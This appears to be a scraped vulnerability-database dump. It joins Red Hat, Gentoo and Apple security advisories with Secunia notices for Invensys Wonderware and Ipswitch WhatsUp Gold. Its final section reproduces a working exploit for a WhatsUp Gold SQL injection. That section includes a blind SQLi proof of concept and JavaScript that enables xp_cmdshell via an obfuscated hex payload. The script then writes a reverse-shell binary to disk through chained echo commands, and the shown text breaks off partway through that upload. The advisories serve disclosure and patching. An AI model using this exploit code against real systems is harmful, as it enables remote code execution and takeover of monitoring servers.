bind-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.ppc.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.ppc.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
s390x:
bind-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.s390.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.s390.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
x86_64:
bind-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
i386:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.i686.rpm
ppc64:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.ppc.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.ppc.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.ppc64.rpm
s390x:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.s390.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.s390.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.s390x.rpm
x86_64:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
i386:
bind-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.i686.rpm
x86_64:
bind-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
i386:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.i686.rpm
x86_64:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-3817.html
https://access.redhat.com/security/updates/classification/#important
http://www.isc.org/software/bind/advisories/cve-2012-3817
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFQF1jgXlSAg2UNWIIRAhfLAKC7IA3Vlbw8YTJSpY/DfKn7S81tIgCgq/b2
7PGAy2HFq2b2y+ASSTx67k0=
=uM7c
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201209-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: BIND: Multiple vulnerabilities
Date: September 24, 2012
Bugs: #402661, #419637, #427966, #434876
ID: 201209-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in BIND, the worst of which
may allow remote Denial of Service.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dns/bind < 9.9.1_p3 >= 9.9.1_p3
Description
===========
Multiple vulnerabilities have been discovered in BIND:
* Domain names are not properly revoked due to an error in the cache
update policy (CVE-2012-1033).
* BIND accepts records with zero-length RDATA fields (CVE-2012-1667).
* A memory leak may occur under high TCP query loads (CVE-2012-3868).
* An assertion error can occur when a query is performed for a record
with RDATA greater than 65535 bytes (CVE-2012-4244).
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All BIND users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-dns/bind-9.9.1_p3"
References
==========
[ 1 ] CVE-2012-1033
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1033
[ 2 ] CVE-2012-1667
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1667
[ 3 ] CVE-2012-3817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3817
[ 4 ] CVE-2012-3868
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3868
[ 5 ] CVE-2012-4244
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4244
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201209-04.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-09-12-1 OS X Mountain Lion v10.8.5 and Security Update
2013-004
OS X Mountain Lion v10.8.5 and Security Update 2013-004 is now
available and addresses the following:
Apache
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Multiple vulnerabilities in Apache
Description: Multiple vulnerabilities existed in Apache, the most
serious of which may lead to cross-site scripting. These issues were
addressed by updating Apache to version 2.2.24.
CVE-ID
CVE-2012-0883
CVE-2012-2687
CVE-2012-3499
CVE-2012-4558
Bind
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Multiple vulnerabilities in BIND
Description: Multiple vulnerabilities existed in BIND, the most
serious of which may lead to a denial of service. CVE-2012-5688 did not
affect Mac OS X v10.7 systems.
CVE-ID
CVE-2012-3817
CVE-2012-4244
CVE-2012-5166
CVE-2012-5688
CVE-2013-2266
Certificate Trust Policy
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots. The complete list of recognized system roots
may be viewed via the Keychain Access application.
ClamAV
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7.5, OS X Lion Server v10.7.5
Impact: Multiple vulnerabilities in ClamAV
Description: Multiple vulnerabilities exist in ClamAV, the most
serious of which may lead to arbitrary code execution. This update
addresses the issues by updating ClamAV to version 0.97.8.
CVE-ID
CVE-2013-2020
CVE-2013-2021
CoreGraphics
Available for: OS X Mountain Lion v10.8 to v10.8.4
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JBIG2
encoded data in PDF files. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-1025 : Felix Groebert of the Google Security Team
ImageIO
Available for: OS X Mountain Lion v10.8 to v10.8.4
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
encoded data in PDF files. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-1026 : Felix Groebert of the Google Security Team
Installer
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Packages could be opened after certificate revocation
Description: When Installer encountered a revoked certificate, it
would present a dialog with an option to continue. The issue was
addressed by removing the dialog and refusing any revoked package.
CVE-ID
CVE-2013-1027
IPSec
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: An attacker may intercept data protected with IPSec Hybrid
Auth
Description: The DNS name of an IPSec Hybrid Auth server was not
being matched against the certificate, allowing an attacker with a
certificate for any server to impersonate any other. This issue was
addressed by properly checking the certificate.
CVE-ID
CVE-2013-1028 : Alexander Traud of www.traud.de
Kernel
Available for: OS X Mountain Lion v10.8 to v10.8.4
Impact: A local network user may cause a denial of service
Description: An incorrect check in the IGMP packet parsing code in
the kernel allowed a user who could send IGMP packets to the system
to cause a kernel panic. The issue was addressed by removing the
check.
CVE-ID
CVE-2013-1029 : Christopher Bohn of PROTECTSTAR INC.
Mobile Device Management
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Passwords may be disclosed to other local users
Description: A password was passed on the command-line to mdmclient,
which made it visible to other users on the same system. The issue
was addressed by communicating the password through a pipe.
CVE-ID
CVE-2013-1030 : Per Olofsson at the University of Gothenburg
OpenSSL
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Multiple vulnerabilities in OpenSSL
Description: Multiple vulnerabilities existed in OpenSSL, the most
serious of which may lead to disclosure of user data. These issues
were addressed by updating OpenSSL to version 0.9.8y.
CVE-ID
CVE-2012-2686
CVE-2013-0166
CVE-2013-0169
PHP
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP, the most
serious of which may lead to arbitrary code execution. These issues
were addressed by updating PHP to version 5.3.26.
CVE-ID
CVE-2013-1635
CVE-2013-1643
CVE-2013-1824
CVE-2013-2110
PostgreSQL
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Multiple vulnerabilities in PostgreSQL
Description: Multiple vulnerabilities exist in PostgreSQL, the most
serious of which may lead to data corruption or privilege escalation.
This update addresses the issues by updating PostgreSQL to version
9.0.13.
CVE-ID
CVE-2013-1899
CVE-2013-1900
CVE-2013-1901
CVE-2013-1902
CVE-2013-1903
Power Management
Available for: OS X Mountain Lion v10.8 to v10.8.4
Impact: The screen saver may not start after the specified time
period
Description: A power assertion lock issue existed. This issue was
addressed through improved lock handling.
CVE-ID
CVE-2013-1031
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 to v10.8.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
'idsc' atoms in QuickTime movie files. This issue was addressed
through additional bounds checking.
CVE-ID
CVE-2013-1032 : Jason Kratzer working with iDefense VCP
Screen Lock
Available for: OS X Mountain Lion v10.8 to v10.8.4
Impact: A user with screen sharing access may be able to bypass the
screen lock when another user is logged in
Description: A session management issue existed in the screen lock's
handling of screen sharing sessions. This issue was addressed through
improved session tracking.
CVE-ID
CVE-2013-1033 : Jeff Grisso of Atos IT Solutions, Sebastien Stormacq
Note: OS X Mountain Lion v10.8.5 also addresses an issue where
certain Unicode strings could cause applications to unexpectedly
terminate.
OS X Mountain Lion v10.8.5 and Security Update 2013-004 may be
obtained from the Software Update pane in System Preferences,
or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
OS X Mountain Lion v10.8.5, or Security Update
2013-004.
For OS X Mountain Lion v10.8.4
The download file is named: OSXUpd10.8.5.dmg
Its SHA-1 digest is: a74ab6d9501778437e7afba0bbed47b776a52b11
For OS X Mountain Lion v10.8 and v10.8.3
The download file is named: OSXUpdCombo10.8.5.dmg
Its SHA-1 digest is: cb798ac9b97ceb2d8875af040ce4ff06187d61f2
For OS X Lion v10.7.5
The download file is named: SecUpd2013-004.dmg
Its SHA-1 digest is: dbc50fce7070f83b93b866a21b8f5c6e65007fa0
For OS X Lion Server v10.7.5
The download file is named: SecUpdSrvr2013-004.dmg
Its SHA-1 digest is: 44a77edbd37732b865bc21a9aac443a3cdc47355
For Mac OS X v10.6.8
The download file is named: SecUpd2013-004.dmg
Its SHA-1 digest is: d07d5142a2549270f0d2eaddb262b41bb5c16b61
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2013-004.dmg
Its SHA-1 digest is: 8f9abe93f7f9427cf86b89bd67df948a85537dbc
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJSMiPGAAoJEPefwLHPlZEw9qMP/17D4Q8velZ3H4AumPzHqqB4
QxPcuv8PXzhi55epUm2bzNfXR9A5L9KvzEsmggqxO2/ESO0zfeKgAmXXjCI3z5Qc
+WkHgqowjwXU9cbjyDkhwb/ylXml+vCSIv2m9eXXNRTRi0rm9ZLSI/JMSRfLMojQ
bZbzQSoSpuGaOeOOWESKCf9zBXFG6DBGo0wg3z8Bkywjtp/7bfddPAFHxIdhjDDN
1IgmhPRnP6NEdNSfR6RwF94M+hyiJ2I2DIDZTIo+6B4Ne90bEYdBiQmSxwKFAyc3
H9VFfB8XmrtA2k4DhE6Ow2jD/Y//QKz6TbyZNSQawXxuPsj43v6/T6BsWdfddGbQ
hDGU85e7z7a4gmIPuS3DjMhSEyAixL/B3vKYBaZltH6JBCcPuLvGrU7nAiJa7KGQ
8MToOyv42TSj95drFzysk5fcO0MIUH5xiGlaU+ScEdBSpIpHDfpjeJYPqxHeGFaa
V2xCGw1vMYbMoxNzRL0FPPdUxJkyBHvuzZXh6c6fATuQIPCtwejpPrYEo7x7RRpl
ytsVLe3V27j7IfWb62nI+mNVfH5m+YgK4SGK5DSq8Nm1Lk0w4HXmTtrhOCogsJ2I
yoqeg/XakiSdxZxhSa9/ZZsMB+D1B8siNzCj0+U0k4zYjxEA0GdSu/dYRVT62oIn
vBrJ5gm+nnyRe2TUMAwz
=h9hc
-----END PGP SIGNATURE-----
| VAR-201207-0173 | CVE-2012-3005 | Invensys Wonderware InTouch Vulnerability gained in |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Untrusted search path vulnerability in Invensys Wonderware InTouch 2012 and earlier, as used in Wonderware Application Server, Wonderware Information Server, Foxboro Control Software, InFusion CE/FE/SCADA, InBatch, and Wonderware Historian, allows local users to gain privileges via a Trojan horse DLL in an unspecified directory. DLL It may be possible to get permission through the file. Invensys is a leading provider of automation and information technology, systems, software solutions, services and consulting for the manufacturing and infrastructure industries. Multiple Invensys Wonderware products are insecure to load library files, allowing an attacker to build specially crafted files, place them on a remote WebDAV or SMB share, entice users to parse, and execute arbitrary code in the application context. Multiple Invensys products are prone to a vulnerability that lets attackers execute arbitrary code. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Invensys Wonderware Products Insecure Library Loading Vulnerability
SECUNIA ADVISORY ID:
SA50028
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50028/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50028
RELEASE DATE:
2012-07-24
DISCUSS ADVISORY:
http://secunia.com/advisories/50028/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50028/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50028
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple Invensys Wonderware
products, which can be exploited by malicious people to compromise a
user's system.
The vulnerability is caused due to the application loading libraries
in an insecure manner.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Carlos Mario Penagos Hollmann.
ORIGINAL ADVISORY:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-177-02.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0700 | No CVE | Privilege escalation vulnerability in Hitachi JP1/NETM/DM |
CVSS V2: 7.2 CVSS V3: - Severity: High |
The package setup manager in Hitachi JP1/NETM/DM contains an privilege escalation vulnerability.A remote attacker could gain privileges via unknown attack vectors.
| VAR-201208-0122 | CVE-2012-2601 | Ipswitch WhatsUp Gold 15.02 contains SQL injection and XSS vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in WrVMwareHostList.asp in Ipswitch WhatsUp Gold 15.02 allows remote attackers to execute arbitrary SQL commands via the sGroupList parameter.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WhatsUp Gold 15.0.2 is vulnerable; other versions may also be affected. Ipswitch WhatsUp Gold is a set of unified infrastructure and application monitoring software from Ipswitch in the United States. The software supports the performance management of networks, servers, virtual environments and applications. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Ipswitch WhatsUp Gold "sGroupList" SQL Injection Vulnerability
SECUNIA ADVISORY ID:
SA50002
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50002/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50002
RELEASE DATE:
2012-07-31
DISCUSS ADVISORY:
http://secunia.com/advisories/50002/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50002/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50002
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Ipswitch WhatsUp Gold, which can
be exploited by malicious people to conduct SQL injection attacks.
Input passed via the "sGroupList" parameter to
NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp
is not properly sanitised before being used in a SQL query. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL
code.
The vulnerability is reported in version 15.02.
SOLUTION:
No official solution is currently available.
PROVIDED AND/OR DISCOVERED BY:
muts, Offensive Security.
ORIGINAL ADVISORY:
http://www.exploit-db.com/exploits/20035/
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. By sending a specially crafted malicious JavaScript payload, the SQLi can be exploited to add a new database administrator to the system, leading to remote code execution.
Blind SQLi Proof of Concept:
WrVMwareHostList.asp?sGroupList=1;WAITFOR DELAY '0:0:10'--&sDeviceList=3
The JavaScript code below will exploit the blind SQL injection vulnerability, enable
xp_cmdshell on the target, upload a reverse shell to the target, and execute it.
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
16 Jul 2012: Email received from Ipswitch stating that the issue will be fixed ASAP
22 Jul 2012: Public Disclosure
######################################################################################
*/
function getCookie(c_name)
{
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==c_name)
{
return unescape(y);
}
}
}
function deleteCookie(c_name)
{
setCookie(c_name, "", -1);
}
function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}
function getHtmlBody(url)
{
var xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET', url, false);
xmlHttp.send(null);
var results = xmlHttp.responseText;
return(results);
}
var attackAnyway = 0;
// Check if a cookie has been set (this indicates we already exploited our target)
// Or if we decided to attack anyway (by setting 'attackAnyway')
if (getCookie("mix0") == undefined || attackAnyway == 1)
{
alert("woot, new attack");
alert(document.cookie);
setCookie("mix0", "1", 1);
alert(document.cookie);
alert("Debug - Enabling XP_CMDSHELL");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;DECLARE @S NVARCHAR(3000);SET @S=CAST(0x45005800450043002000730070005F0063006F006E0066006900670075007200650020002700730068006F007700200061006400760061006E0063006500640020006F007000740069006F006E00730027002C00200031003B005200450043004F004E004600490047005500520045003B0045005800450043002000730070005F0063006F006E0066006900670075007200650020002700780070005F0063006D0064007300680065006C006C0027002C00200031003B005200450043004F004E004600490047005500520045003B000A AS NVARCHAR(3000));Exec (@S);--&sDeviceList=3");
alert("Debug - Uploading Reverse Shell");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo n 1.dll >123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0100 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0180 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 5d cf 9f 87 19 ae f1 d4 19 ae f1 d4 19 ae f1 d4 97 b1 e2 d4 13 ae f1 d4 e5 8e e3 d4 18 ae f1 d4 52 69 63 68 19 ae f1 d4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 da 4d 03 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 0c 00 02 00 00 00 06 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0200 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 20 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
